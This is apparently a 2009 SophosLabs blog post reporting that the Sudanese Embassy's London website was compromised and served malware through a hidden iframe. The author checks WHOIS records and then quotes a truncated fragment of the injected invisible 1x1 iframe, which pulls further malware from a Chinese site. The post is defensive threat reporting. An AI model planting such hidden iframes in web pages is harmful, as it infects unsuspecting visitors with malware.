YAE: Yet Another Embassy — The Republic of Sudan in London
Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release heading were strange:-
- Who is Blackmailing Whom?
- ICC – Europe’s Guantanamo?
- Sudan and ICC
- National Elections Commission
The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:
Registrant's address: 60 Chambers Lane London NW10 2RL United Kingdom
NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.
The Contact details were correct though:-
Embassy of the Republic of the Sudan 3 Cleveland Row St. James’s London SW1A 1DD
Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!
So why had the site come up in the queues?
Well it contains an iframe with the following code:
.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">
this malicious Iframe is very small and will download further malware from a Chinese website.
Like other embassies that have been hit, Ethiopia, India etc., the Sudanese haven’t been targeted deliberately but are victims of poor security.
Posted on September 10th, 2009 by Pob, SophosLabs, UKFiled under: Exploits, General, Malware
Windows 7 security - A great leap forward or business as usual?
